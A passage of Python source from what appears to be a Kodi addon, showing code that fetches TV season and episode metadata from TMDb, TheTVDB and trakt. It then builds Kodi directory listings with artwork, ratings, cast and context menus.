            url = self.tmdb_by_imdb % imdb
            result = client.request(url, timeout='10')
            result = json.loads(result)
            tmdb = result['tv_results'][0]['id']
            if tmdb == '' or tmdb == None: tmdb = '0'
            tmdb = re.sub('[^0-9]', '', str(tmdb))
            tmdb = tmdb.encode('utf-8')
        if tmdb == '0' and not tvdb == '0':
            url = self.tmdb_by_tvdb % tvdb
            result = client.request(url, timeout='10')
            result = json.loads(result)
            tmdb = result['tv_results'][0]['id']
            if tmdb == '' or tmdb == None: tmdb = '0'
            tmdb = re.sub('[^0-9]', '', str(tmdb))
            tmdb = tmdb.encode('utf-8')
        if tmdb == '0': raise Exception()
        #url = self.tmdb_info_link % (tmdb, lang)
        url = self.tmdb_info_link % (tmdb, 'en')
        item = client.request(url, timeout='10')
        item = json.loads(item)
    except:
        pass
    # --- download and parse the TVDb zip bundle; this part is required,
    # so a failure aborts the whole method (returns None). ---
    try:
        if tvdb == '0': raise Exception()
        #tvdb_lang = re.sub('bg', 'en', lang)
        tvdb_lang = 'en'
        url = self.tvdb_info_link % (tvdb, tvdb_lang)
        data = urllib2.urlopen(url, timeout=30).read()
        zip = zipfile.ZipFile(StringIO.StringIO(data))
        result = zip.read('%s.xml' % tvdb_lang)
        artwork = zip.read('banners.xml')
        zip.close()
        # follow a '***Duplicate NNN***' redirect and re-download once
        dupe = client.parseDOM(result, 'SeriesName')[0]
        dupe = re.compile('[***]Duplicate (\d*)[***]').findall(dupe)
        if len(dupe) > 0:
            tvdb = str(dupe[0]).encode('utf-8')
            url = self.tvdb_info_link % (tvdb, tvdb_lang)
            data = urllib2.urlopen(url, timeout=30).read()
            zip = zipfile.ZipFile(StringIO.StringIO(data))
            result = zip.read('%s.xml' % tvdb_lang)
            artwork = zip.read('banners.xml')
            zip.close()
        # keep only English per-season poster banners
        artwork = artwork.split('<Banner>')
        artwork = [i for i in artwork if '<Language>en</Language>' in i and '<BannerType>season</BannerType>' in i]
        artwork = [i for i in artwork if not 'seasonswide' in re.compile('<BannerPath>(.+?)</BannerPath>').findall(i)[0]]
        # item2 = the <Series> header chunk; the rest are <Episode> chunks
        result = result.split('<Episode>')
        item2 = result[0]
        episodes = [i for i in result if '<EpisodeNumber>' in i]
        episodes = [i for i in episodes if not '<SeasonNumber>0</SeasonNumber>' in i]
        episodes = [i for i in episodes if not '<EpisodeNumber>0</EpisodeNumber>' in i]
        # first episode of each season doubles as that season's entry
        seasons = [i for i in episodes if '<EpisodeNumber>1</EpisodeNumber>' in i]
        result = ''
        # narrow down what the caller asked for via 'limit' (see docstring)
        if limit == '':
            episodes = []
        elif limit == '-1' or limit == '-2':
            seasons = []
        else:
            episodes = [i for i in episodes if '<SeasonNumber>%01d</SeasonNumber>' % int(limit) in i]
            seasons = []
        # --- show-level fields: prefer TMDb ('item'), fall back to TVDb ('item2') ---
        try: poster = item['poster_path']
        except: poster = ''
        if poster == '' or poster == None: poster = '0'
        if not poster == '0': poster = self.tmdb_poster + poster
        if poster == '0':
            try: poster = client.parseDOM(item2, 'poster')[0]
            except: poster = ''
            if not poster == '': poster = self.tvdb_image + poster
            else: poster = '0'
        poster = client.replaceHTMLCodes(poster)
        poster = poster.encode('utf-8')
        try: banner = client.parseDOM(item2, 'banner')[0]
        except: banner = ''
        if not banner == '': banner = self.tvdb_image + banner
        else: banner = '0'
        banner = client.replaceHTMLCodes(banner)
        banner = banner.encode('utf-8')
        try: fanart = item['backdrop_path']
        except: fanart = ''
        if fanart == '' or fanart == None: fanart = '0'
        if not fanart == '0': fanart = self.tmdb_image + fanart
        if fanart == '0':
            try: fanart = client.parseDOM(item2, 'fanart')[0]
            except: fanart = ''
            if not fanart == '': fanart = self.tvdb_image + fanart
            else: fanart = '0'
        fanart = client.replaceHTMLCodes(fanart)
        fanart = fanart.encode('utf-8')
        # cross-substitute missing artwork
        if not poster == '0': pass
        elif not fanart == '0': poster = fanart
        elif not banner == '0': poster = banner
        if not banner == '0': pass
        elif not fanart == '0': banner = fanart
        elif not poster == '0': banner = poster
        try: tvrage2 = item['external_ids']['tvrage_id']
        except: tvrage2 = '0'
        if tvrage == '0' or tvrage == None: tvrage = tvrage2
        if tvrage == '' or tvrage == None: tvrage = '0'
        tvrage = re.sub('[^0-9]', '', str(tvrage))
        tvrage = tvrage.encode('utf-8')
        try: status = client.parseDOM(item2, 'Status')[0]
        except: status = ''
        if status == '': status = 'Ended'
        status = client.replaceHTMLCodes(status)
        status = status.encode('utf-8')
        # 'alter' flags unscripted shows ('1') — presumably consumed by
        # alternate-airdate handling elsewhere; TODO confirm against caller
        try: alter = client.parseDOM(item2, 'Genre')[0]
        except: alter = '0'
        if any(x in alter for x in ['Documentary', 'Reality', 'Game Show', 'Talk Show']): alter = '1'
        else: alter = '0'
        alter = alter.encode('utf-8')
        try: studio = item['networks'][0]['name']
        except: studio = ''
        if studio == '' or studio == None:
            try: studio = client.parseDOM(item2, 'Network')[0]
            except: studio = ''
        if studio == '': studio = '0'
        studio = client.replaceHTMLCodes(studio)
        studio = studio.encode('utf-8')
        try: genre = item['genres']
        except: genre = []
        try: genre = [x['name'] for x in genre]
        except: genre = []
        if genre == '' or genre == None or genre == []:
            try: genre = client.parseDOM(item2, 'Genre')[0]
            except: genre = ''
            genre = [x for x in genre.split('|') if not x == '']
        genre = ' / '.join(genre)
        if genre == '': genre = '0'
        genre = client.replaceHTMLCodes(genre)
        genre = genre.encode('utf-8')
        try: duration = str(item['episode_run_time'][0])
        except: duration = ''
        if duration == '' or duration == None:
            try: duration = client.parseDOM(item2, 'Runtime')[0]
            except: duration = ''
        if duration == '': duration = '0'
        duration = client.replaceHTMLCodes(duration)
        duration = duration.encode('utf-8')
        try: rating = str(item['vote_average'])
        except: rating = ''
        if rating == '' or rating == None:
            try: rating = client.parseDOM(item2, 'Rating')[0]
            except: rating = ''
        if rating == '': rating = '0'
        rating = client.replaceHTMLCodes(rating)
        rating = rating.encode('utf-8')
        try: votes = str(item['vote_count'])
        except: votes = ''
        try: votes = str(format(int(votes),',d'))
        except: pass
        if votes == '' or votes == None:
            try: votes = client.parseDOM(item2, 'RatingCount')[0]
            except: votes = '0'
        if votes == '': votes = '0'
        votes = client.replaceHTMLCodes(votes)
        votes = votes.encode('utf-8')
        try: mpaa = item['content_ratings']['results'][-1]['rating']
        except: mpaa = ''
        if mpaa == '' or mpaa == None:
            try: mpaa = client.parseDOM(item2, 'ContentRating')[0]
            except: mpaa = ''
        if mpaa == '': mpaa = '0'
        mpaa = client.replaceHTMLCodes(mpaa)
        mpaa = mpaa.encode('utf-8')
        try: cast = item['credits']['cast']
        except: cast = []
        try: cast = [(x['name'].encode('utf-8'), x['character'].encode('utf-8')) for x in cast]
        except: cast = []
        if cast == []:
            try: cast = client.parseDOM(item2, 'Actors')[0]
            except: cast = ''
            cast = [x for x in cast.split('|') if not x == '']
            try: cast = [(x.encode('utf-8'), '') for x in cast]
            except: cast = []
        try: plot = item['overview']
        except: plot = ''
        if plot == '' or plot == None:
            try: plot = client.parseDOM(item2, 'Overview')[0]
            except: plot = ''
        if plot == '': plot = '0'
        plot = client.replaceHTMLCodes(plot)
        plot = plot.encode('utf-8')
    except:
        return
    # --- one self.list entry per season (thumb from banners.xml) ---
    for item in seasons:
        try:
            premiered = client.parseDOM(item, 'FirstAired')[0]
            if premiered == '' or '-00' in premiered: premiered = '0'
            premiered = client.replaceHTMLCodes(premiered)
            premiered = premiered.encode('utf-8')
            # skip not-yet-aired seasons of a still-running show; the digit
            # comparison works because both strings are YYYY-MM-DD
            if status == 'Ended': pass
            elif premiered == '0': raise Exception()
            elif int(re.sub('[^0-9]', '', str(premiered))) > int(re.sub('[^0-9]', '', str(self.today_date))): raise Exception()
            season = client.parseDOM(item, 'SeasonNumber')[0]
            season = '%01d' % int(season)
            season = season.encode('utf-8')
            thumb = [i for i in artwork if client.parseDOM(i, 'Season')[0] == season]
            try: thumb = client.parseDOM(thumb[0], 'BannerPath')[0]
            except: thumb = ''
            if not thumb == '': thumb = self.tvdb_image + thumb
            else: thumb = '0'
            thumb = client.replaceHTMLCodes(thumb)
            thumb = thumb.encode('utf-8')
            if thumb == '0': thumb = poster
            self.list.append({'season': season, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': status, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'cast': cast, 'plot': plot, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb})
        except:
            pass
    # --- one self.list entry per episode; episode fields override or
    # fall back to the show-level fields computed above ---
    for item in episodes:
        try:
            premiered = client.parseDOM(item, 'FirstAired')[0]
            if premiered == '' or '-00' in premiered: premiered = '0'
            premiered = client.replaceHTMLCodes(premiered)
            premiered = premiered.encode('utf-8')
            if status == 'Ended': pass
            elif premiered == '0': raise Exception()
            elif int(re.sub('[^0-9]', '', str(premiered))) > int(re.sub('[^0-9]', '', str(self.today_date))): raise Exception()
            season = client.parseDOM(item, 'SeasonNumber')[0]
            season = '%01d' % int(season)
            season = season.encode('utf-8')
            episode = client.parseDOM(item, 'EpisodeNumber')[0]
            episode = re.sub('[^0-9]', '', '%01d' % int(episode))
            episode = episode.encode('utf-8')
            title = client.parseDOM(item, 'EpisodeName')[0]
            if title == '': title = '0'
            title = client.replaceHTMLCodes(title)
            title = title.encode('utf-8')
            name = '%s S%02dE%02d' % (tvshowtitle, int(season), int(episode))
            try: name = name.encode('utf-8')
            except: pass
            try: thumb = client.parseDOM(item, 'filename')[0]
            except: thumb = ''
            if not thumb == '': thumb = self.tvdb_image + thumb
            else: thumb = '0'
            thumb = client.replaceHTMLCodes(thumb)
            thumb = thumb.encode('utf-8')
            # fall back to fanart (rewritten to the cached/poster host) or poster
            if not thumb == '0': pass
            elif not fanart == '0': thumb = fanart.replace(self.tmdb_image, self.tmdb_poster).replace(self.tvdb_image, self.tvdb_poster)
            elif not poster == '0': thumb = poster
            try: rating = client.parseDOM(item, 'Rating')[0]
            except: rating = ''
            if rating == '': rating = '0'
            rating = client.replaceHTMLCodes(rating)
            rating = rating.encode('utf-8')
            try: director = client.parseDOM(item, 'Director')[0]
            except: director = ''
            director = [x for x in director.split('|') if not x == '']
            director = ' / '.join(director)
            if director == '': director = '0'
            director = client.replaceHTMLCodes(director)
            director = director.encode('utf-8')
            try: writer = client.parseDOM(item, 'Writer')[0]
            except: writer = ''
            writer = [x for x in writer.split('|') if not x == '']
            writer = ' / '.join(writer)
            if writer == '': writer = '0'
            writer = client.replaceHTMLCodes(writer)
            writer = writer.encode('utf-8')
            try: episodeplot = client.parseDOM(item, 'Overview')[0]
            except: episodeplot = ''
            if episodeplot == '': episodeplot = '0'
            if episodeplot == '0': episodeplot = plot
            episodeplot = client.replaceHTMLCodes(episodeplot)
            try: episodeplot = episodeplot.encode('utf-8')
            except: pass
            self.list.append({'title': title, 'season': season, 'episode': episode, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': status, 'alter': alter, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'director': director, 'writer': writer, 'cast': cast, 'plot': episodeplot, 'name': name, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb})
        except:
            pass
    return self.list
def seasonDirectory(self, items):
    """
    Render a list of season dicts (as built by tvdb_list) as a Kodi
    directory: one ListItem per season with artwork, info labels,
    watched-state overlay and a context menu. No return value.
    """
    if items == None or len(items) == 0: return
    # isFolder here only controls whether the 'queue' context entry is
    # shown; the addItem call below always passes isFolder=True because
    # a season always opens an episode listing.
    isFolder = True if control.setting('autoplay') == 'false' and control.setting('host_select') == '1' else False
    isFolder = False if control.window.getProperty('PseudoTVRunning') == 'True' else isFolder
    traktMode = False if trakt.getTraktCredentials() == False else True
    addonPoster, addonBanner = control.addonPoster(), control.addonBanner()
    addonFanart, settingFanart = control.addonFanart(), control.setting('fanart')
    sysaddon = sys.argv[0]
    try:
        favitems = favourites.getFavourites('tvshows')
        favitems = [i[0] for i in favitems]
    except:
        pass
    # NOTE(review): if this fails, 'indicators' stays unbound and the
    # per-item playcount try-block below silently falls through.
    try: indicators = playcount.getSeasonIndicators(items[0]['imdb'])
    except: pass
    # NOTE(review): both ternary branches are identical, so the trakt
    # check is currently a no-op — probably a leftover edit.
    watchedMenu = control.lang(30263).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30263).encode('utf-8')
    unwatchedMenu = control.lang(30264).encode('utf-8') if trakt.getTraktIndicatorsInfo() == True else control.lang(30264).encode('utf-8')
    for i in items:
        try:
            label = '%s %s' % ('Season', i['season'])
            systitle = sysname = urllib.quote_plus(i['tvshowtitle'])
            imdb, tmdb, tvdb, tvrage, year, season = i['imdb'], i['tmdb'], i['tvdb'], i['tvrage'], i['year'], i['season']
            poster, banner, fanart, thumb = i['poster'], i['banner'], i['fanart'], i['thumb']
            # substitute addon placeholder art for missing images
            if poster == '0': poster = addonPoster
            if banner == '0' and poster == '0': banner = addonBanner
            elif banner == '0': banner = poster
            if thumb == '0' and poster == '0': thumb = addonPoster
            elif thumb == '0': thumb = poster
            # drop '0' sentinel fields so they never reach Kodi infolabels
            meta = dict((k,v) for k, v in i.iteritems() if not v == '0')
            meta.update({'trailer': '%s?action=trailer&name=%s' % (sysaddon, sysname)})
            if i['duration'] == '0': meta.update({'duration': '60'})
            # duration is stored in minutes; Kodi expects seconds
            try: meta.update({'duration': str(int(meta['duration']) * 60)})
            except: pass
            sysmeta = urllib.quote_plus(json.dumps(meta))
            try:
                if season in indicators: meta.update({'playcount': 1, 'overlay': 7})
                else: meta.update({'playcount': 0, 'overlay': 6})
            except Exception as e:
                control.log('#indicators %s' %e )
                pass
            url = '%s?action=episodes&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s&season=%s' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage, season)
            # context menu
            cm = []
            if isFolder == False:
                cm.append((control.lang(30261).encode('utf-8'), 'RunPlugin(%s?action=queueItem)' % sysaddon))
            cm.append((control.lang(30262).encode('utf-8'), 'Action(Info)'))
            cm.append((watchedMenu, 'RunPlugin(%s?action=tvPlaycount&name=%s&imdb=%s&tvdb=%s&season=%s&query=7)' % (sysaddon, systitle, imdb, tvdb, season)))
            cm.append((unwatchedMenu, 'RunPlugin(%s?action=tvPlaycount&name=%s&imdb=%s&tvdb=%s&season=%s&query=6)' % (sysaddon, systitle, imdb, tvdb, season)))
            #cm.append((control.lang(30263).encode('utf-8'), 'RunPlugin(%s?action=tvPlaycount&name=%s&year=%s&imdb=%s&tvdb=%s&season=%s&query=7)' % (sysaddon, systitle, year, imdb, tvdb, season)))
            #cm.append((control.lang(30264).encode('utf-8'), 'RunPlugin(%s?action=tvPlaycount&name=%s&year=%s&imdb=%s&tvdb=%s&season=%s&query=6)' % (sysaddon, systitle, year, imdb, tvdb, season)))
            if traktMode == True:
                cm.append((control.lang(30265).encode('utf-8'), 'RunPlugin(%s?action=traktManager&name=%s&tvdb=%s&content=tvshow)' % (sysaddon, sysname, tvdb)))
            if not imdb in favitems and not tvdb in favitems: cm.append((control.lang(30266).encode('utf-8'), 'RunPlugin(%s?action=addFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
            else: cm.append((control.lang(30267).encode('utf-8'), 'RunPlugin(%s?action=deleteFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
            cm.append((control.lang(30268).encode('utf-8'), 'RunPlugin(%s?action=tvshowToLibrary&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s)' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage)))
            cm.append((control.lang(30269).encode('utf-8'), 'RunPlugin(%s?action=addView&content=seasons)' % sysaddon))
            # build and register the ListItem
            item = control.item(label=label, iconImage=thumb, thumbnailImage=thumb)
            try: item.setArt({'poster': thumb, 'tvshow.poster': poster, 'season.poster': thumb, 'banner': banner, 'tvshow.banner': banner, 'season.banner': banner})
            except: pass
            if settingFanart == 'true' and not fanart == '0':
                item.setProperty('Fanart_Image', fanart)
            elif not addonFanart == None:
                item.setProperty('Fanart_Image', addonFanart)
            item.setInfo(type='Video', infoLabels = meta)
            item.setProperty('Video', 'true')
            item.addContextMenuItems(cm, replaceItems=True)
            control.addItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=True)
        except:
            pass
    try: control.property(int(sys.argv[1]), 'showplot', items[0]['plot'])
    except: pass
    control.content(int(sys.argv[1]), 'seasons')
    control.directory(int(sys.argv[1]), cacheToDisc=True)
    views.setView('seasons', {'skin.confluence': 500})
class episodes:
def __init__(self):
    """Set up endpoint URLs, reference timestamps and user settings."""
    self.list = []
    # reference clock: UTC shifted back 5 hours (US eastern airing day)
    now = datetime.datetime.utcnow() - datetime.timedelta(hours = 5)
    self.datetime = now
    self.systime = now.strftime('%Y%m%d%H%M%S%f')
    self.today_date = now.strftime('%Y-%m-%d')
    # user configuration
    self.trakt_user = control.setting('trakt.user')
    self.info_lang = control.info_lang or 'en'
    # trakt endpoints
    self.trakt_link = 'http://api-v2launch.trakt.tv'
    self.mycalendar_link = 'http://api-v2launch.trakt.tv/calendars/my/shows/%s/31/' % (now - datetime.timedelta(days = 32)).strftime('%Y-%m-%d')
    self.progress_link = 'http://api-v2launch.trakt.tv/users/%s/watched/shows' % self.trakt_user
    self.calendar_link = 'http://api-v2launch.trakt.tv/calendars/all/shows/%s/%s'
    # TheTVDB endpoints (API key stored base64-obfuscated)
    self.tvdb_key = base64.urlsafe_b64decode('MUQ2MkYyRjkwMDMwQzQ0NA==')
    self.tvdb_info_link = 'http://thetvdb.com/api/%s/series/%s/all/%s.zip' % (self.tvdb_key, '%s', '%s')
    self.tvdb_image = 'http://thetvdb.com/banners/'
    self.tvdb_poster = 'http://thetvdb.com/banners/_cache/'
    # scene-release listing site
    self.scn_link = 'http://m2v.ru'
    self.added_link = 'http://m2v.ru/?Part=11&func=part&page=1'
def get(self, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, season=None, episode=None, idx=True):
    """
    Fetch episode metadata for a show and (when idx is True) render it
    as a directory. With an episode given, the list is trimmed so it
    starts at that episode. idx False returns raw metadata only.
    Returns the list, or None on failure.
    """
    try:
        if not idx == True:
            # metadata-only probe: no cache, no directory build
            self.list = seasons().tvdb_list(tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang, '-2')
            return self.list
        if episode == None:
            self.list = cache.get(seasons().tvdb_list, 1, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang, season)
        else:
            self.list = cache.get(seasons().tvdb_list, 1, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang, '-1')
            # drop everything before the requested episode
            start = [pos for pos, entry in enumerate(self.list) if entry['season'] == str(season) and entry['episode'] == str(episode)][-1]
            self.list = self.list[start:]
        self.episodeDirectory(self.list)
        return self.list
    except:
        pass
def calendar(self, url):
    """
    Build an episode directory from one of the calendar sources.
    'url' may also be a shorthand name ('added', 'progress', ...) that
    resolves to the matching *_link attribute. Returns the list, or
    None on failure.
    """
    try:
        # resolve shorthand names to the corresponding endpoint
        try: url = getattr(self, url + '_link')
        except: pass
        try: host = urlparse.urlparse(url).netloc.lower()
        except: pass
        # substring matching (not equality) picks the fetcher; the two
        # specific endpoints are tested before the generic trakt host
        if url in self.progress_link:
            self.list = cache.get(self.trakt_list2, 1, url, self.info_lang)
        elif url in self.mycalendar_link:
            self.list = cache.get(self.trakt_list, 1, url)
        elif host in self.trakt_link:
            self.list = cache.get(self.trakt_list, 8760, url)
        elif host in self.scn_link:
            self.list = cache.get(self.scn_list, 1, url)
        self.episodeDirectory(self.list)
        return self.list
    except:
        pass
def widget(self):
    """Dispatch the home-screen widget to the configured episode source."""
    # trakt users get their own widget-source setting
    if trakt.getTraktCredentials() == False:
        choice = control.setting('tv_widget')
    else:
        choice = control.setting('tv_alt_widget')
    if choice == '2':
        self.favourites()
    elif choice == '3':
        self.calendar(self.progress_link)
    elif choice == '4':
        self.calendar(self.mycalendar_link)
    else:
        # default: recently added episodes
        self.calendar(self.added_link)
def favourites(self):
    """
    Build an episode directory of the last 30 days of airings for
    favourited shows only. Fetches the 30 daily calendar pages in
    parallel worker threads. Returns the list, or None on failure.
    """
    try:
        favitems = [entry[0] for entry in favourites.getFavourites('tvshows')]
        if len(favitems) == 0: raise Exception()

        # each worker appends one day's calendar page onto self.list
        def fetch(u): self.list += cache.get(self.trakt_list, 8760, u)

        urls = [self.calendar_link % ((self.datetime - datetime.timedelta(days = d)).strftime('%Y-%m-%d'), '1') for d in range(1, 31)]
        threads = [workers.Thread(fetch, u) for u in urls]
        [t.start() for t in threads]
        [t.join() for t in threads]
        # keep only favourited shows, newest first
        self.list = [i for i in self.list if i['imdb'] in favitems or i['tvdb'] in favitems]
        self.list = sorted(self.list, key=lambda k: k['premiered'], reverse=True)
        self.episodeDirectory(self.list)
        return self.list
    except:
        return
def calendars(self):
    """
    List the last 30 days as selectable calendar entries, with day and
    month names localized through the addon language file.
    Returns self.list.
    """
    # (string-id, English name) pairs used to localize strftime output
    translations = [(30521, 'Monday'), (30522, 'Tuesday'), (30523, 'Wednesday'), (30524, 'Thursday'), (30525, 'Friday'), (30526, 'Saturday'), (30527, 'Sunday'), (30528, 'January'), (30529, 'February'), (30530, 'March'), (30531, 'April'), (30532, 'May'), (30533, 'June'), (30534, 'July'), (30535, 'August'), (30536, 'September'), (30537, 'October'), (30538, 'November'), (30539, 'December')]
    for offset in range(0, 30):
        try:
            day = self.datetime - datetime.timedelta(days = offset)
            name = '[B]%s[/B] : %s' % (day.strftime('%A'), day.strftime('%d %B'))
            for code, english in translations:
                name = name.replace(english, control.lang(code).encode('utf-8'))
            try: name = name.encode('utf-8')
            except: pass
            url = self.calendar_link % (day.strftime('%Y-%m-%d'), '1')
            self.list.append({'name': name, 'url': url, 'image': 'calendar.jpg', 'action': 'calendar'})
        except:
            pass
    self.addDirectory(self.list)
    return self.list
def trakt_list(self, url):
    """
    Fetch a trakt calendar-style endpoint and convert each entry into
    this addon's episode dict format. Malformed entries are skipped via
    the raise/except pattern. Returns the list reversed (oldest entries
    from the feed end up last), or None if the request itself fails.
    """
    try:
        itemlist = []
        url += '?extended=full,images'
        result = trakt.getTrakt(url)
        items = json.loads(result)
    except:
        return
    for item in items:
        try:
            # --- mandatory fields: missing/zero values abort this entry ---
            title = item['episode']['title']
            if title == None or title == '': raise Exception()
            title = client.replaceHTMLCodes(title)
            title = title.encode('utf-8')
            season = item['episode']['season']
            season = re.sub('[^0-9]', '', '%01d' % int(season))
            if season == '0': raise Exception()
            season = season.encode('utf-8')
            episode = item['episode']['number']
            episode = re.sub('[^0-9]', '', '%01d' % int(episode))
            if episode == '0': raise Exception()
            episode = episode.encode('utf-8')
            tvshowtitle = item['show']['title']
            if tvshowtitle == None or tvshowtitle == '': raise Exception()
            tvshowtitle = client.replaceHTMLCodes(tvshowtitle)
            tvshowtitle = tvshowtitle.encode('utf-8')
            year = item['show']['year']
            year = re.sub('[^0-9]', '', str(year))
            year = year.encode('utf-8')
            name = '%s S%02dE%02d' % (tvshowtitle, int(season), int(episode))
            try: name = name.encode('utf-8')
            except: pass
            # --- ids: tvdb is required, the rest default to '0' ---
            imdb = item['show']['ids']['imdb']
            if imdb == None or imdb == '': imdb = '0'
            else: imdb = 'tt' + re.sub('[^0-9]', '', str(imdb))
            imdb = imdb.encode('utf-8')
            tvdb = item['show']['ids']['tvdb']
            if tvdb == None or tvdb == '': raise Exception()
            tvdb = re.sub('[^0-9]', '', str(tvdb))
            tvdb = tvdb.encode('utf-8')
            tmdb = item['show']['ids']['tmdb']
            if tmdb == None or tmdb == '': tmdb = '0'
            tmdb = re.sub('[^0-9]', '', str(tmdb))
            tmdb = tmdb.encode('utf-8')
            tvrage = item['show']['ids']['tvrage']
            if tvrage == None or tvrage == '': tvrage = '0'
            tvrage = re.sub('[^0-9]', '', str(tvrage))
            tvrage = tvrage.encode('utf-8')
            # --- artwork: validate by URL path, strip query strings ---
            poster = '0'
            try: poster = item['show']['images']['poster']['medium']
            except: pass
            if poster == None or not '/posters/' in poster: poster = '0'
            poster = poster.rsplit('?', 1)[0]
            poster = poster.encode('utf-8')
            banner = poster
            try: banner = item['show']['images']['banner']['full']
            except: pass
            if banner == None or not '/banners/' in banner: banner = poster
            banner = banner.rsplit('?', 1)[0]
            banner = banner.encode('utf-8')
            fanart = '0'
            try: fanart = item['show']['images']['fanart']['full']
            except: pass
            if fanart == None or not '/fanarts/' in fanart: fanart = '0'
            fanart = fanart.rsplit('?', 1)[0]
            fanart = fanart.encode('utf-8')
            # thumb preference: episode screenshot > show thumb > fanart
            thumb1 = item['episode']['images']['screenshot']['thumb']
            thumb2 = item['show']['images']['thumb']['full']
            if '/screenshots/' in thumb1: thumb = thumb1
            elif '/thumbs/' in thumb2: thumb = thumb2
            else: thumb = fanart
            thumb = thumb.rsplit('?', 1)[0]
            try: thumb = thumb.encode('utf-8')
            except: pass
            # --- remaining info labels, all defaulting to '0' ---
            premiered = item['episode']['first_aired']
            try: premiered = re.compile('(\d{4}-\d{2}-\d{2})').findall(premiered)[0]
            except: premiered = '0'
            premiered = premiered.encode('utf-8')
            studio = item['show']['network']
            if studio == None: studio = '0'
            studio = studio.encode('utf-8')
            # 'alter' flags unscripted shows ('1'); trakt genre slugs are lowercase
            alter = item['show']['genres']
            if any(x in alter for x in ['documentary', 'reality']): alter = '1'
            else: alter = '0'
            alter = alter.encode('utf-8')
            genre = item['show']['genres']
            genre = [i.title() for i in genre]
            if genre == []: genre = '0'
            genre = ' / '.join(genre)
            genre = genre.encode('utf-8')
            try: duration = str(item['show']['runtime'])
            except: duration = '0'
            if duration == None: duration = '0'
            duration = duration.encode('utf-8')
            try: rating = str(item['episode']['rating'])
            except: rating = '0'
            if rating == None or rating == '0.0': rating = '0'
            rating = rating.encode('utf-8')
            try: votes = str(item['show']['votes'])
            except: votes = '0'
            try: votes = str(format(int(votes),',d'))
            except: pass
            if votes == None: votes = '0'
            votes = votes.encode('utf-8')
            mpaa = item['show']['certification']
            if mpaa == None: mpaa = '0'
            mpaa = mpaa.encode('utf-8')
            plot = item['episode']['overview']
            if plot == None or plot == '': plot = item['show']['overview']
            if plot == None or plot == '': plot = '0'
            plot = client.replaceHTMLCodes(plot)
            plot = plot.encode('utf-8')
            itemlist.append({'title': title, 'season': season, 'episode': episode, 'tvshowtitle': tvshowtitle, 'year': year, 'premiered': premiered, 'status': 'Continuing', 'alter': alter, 'studio': studio, 'genre': genre, 'duration': duration, 'rating': rating, 'votes': votes, 'mpaa': mpaa, 'director': '0', 'writer': '0', 'cast': '0', 'plot': plot, 'name': name, 'code': imdb, 'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'poster': poster, 'banner': banner, 'fanart': fanart, 'thumb': thumb})
        except:
            pass
    # feed arrives newest-first; reverse so callers get oldest-first
    itemlist = itemlist[::-1]
    return itemlist
def trakt_list2(self, url, lang):
    """
    'Next episode to watch' list: read the user's trakt watched-progress
    feed, keep shows that still have unaired/unwatched episodes, and for
    each one resolve the episode AFTER the last watched one from the
    TVDb zip bundle (fetched in parallel worker threads, capped at 30
    shows). Appends to self.list, sorted newest-premiere first.
    Returns self.list, or None if the feed request fails.
    """
    try:
        url += '?extended=full'
        result = trakt.getTrakt(url)
        result = json.loads(result)
        items = []
    except:
        return
    # --- pass 1: from the progress feed, keep shows with unwatched episodes ---
    for item in result:
        try:
            # watched count vs. total aired count; fully-watched shows are skipped
            num_1 = 0
            for i in range(0, len(item['seasons'])): num_1 += len(item['seasons'][i]['episodes'])
            num_2 = int(item['show']['aired_episodes'])
            if num_1 >= num_2: raise Exception()
            # last watched position
            season = str(item['seasons'][-1]['number'])
            season = season.encode('utf-8')
            episode = str(item['seasons'][-1]['episodes'][-1]['number'])
            episode = episode.encode('utf-8')
            tvshowtitle = item['show']['title']
            if tvshowtitle == None or tvshowtitle == '': raise Exception()
            tvshowtitle = client.replaceHTMLCodes(tvshowtitle)
            tvshowtitle = tvshowtitle.encode('utf-8')
            year = item['show']['year']
            year = re.sub('[^0-9]', '', str(year))
            if int(year) > int(self.datetime.strftime('%Y')): raise Exception()
            imdb = item['show']['ids']['imdb']
            if imdb == None or imdb == '': raise Exception()
            imdb = 'tt' + re.sub('[^0-9]', '', str(imdb))
            imdb = imdb.encode('utf-8')
            tvdb = item['show']['ids']['tvdb']
            if tvdb == None or tvdb == '': raise Exception()
            tvdb = re.sub('[^0-9]', '', str(tvdb))
            tvdb = tvdb.encode('utf-8')
            tmdb = item['show']['ids']['tmdb']
            if tmdb == None or tmdb == '': tmdb = '0'
            tmdb = re.sub('[^0-9]', '', str(tmdb))
            tmdb = tmdb.encode('utf-8')
            tvrage = item['show']['ids']['tvrage']
            if tvrage == None or tvrage == '': tvrage = '0'
            tvrage = re.sub('[^0-9]', '', str(tvrage))
            tvrage = tvrage.encode('utf-8')
            items.append({'imdb': imdb, 'tmdb': tmdb, 'tvdb': tvdb, 'tvrage': tvrage, 'tvshowtitle': tvshowtitle, 'year': year, 'season': season, 'episode': episode})
        except:
            pass
    # --- pass 2 (per-show worker): resolve the NEXT episode after the
    # last watched one from the TVDb bundle and append a full entry. ---
    def items_list(i):
        try:
            tvdb_lang = re.sub('bg', 'en', lang)
            url = self.tvdb_info_link % (i['tvdb'], tvdb_lang)
            data = urllib2.urlopen(url, timeout=10).read()
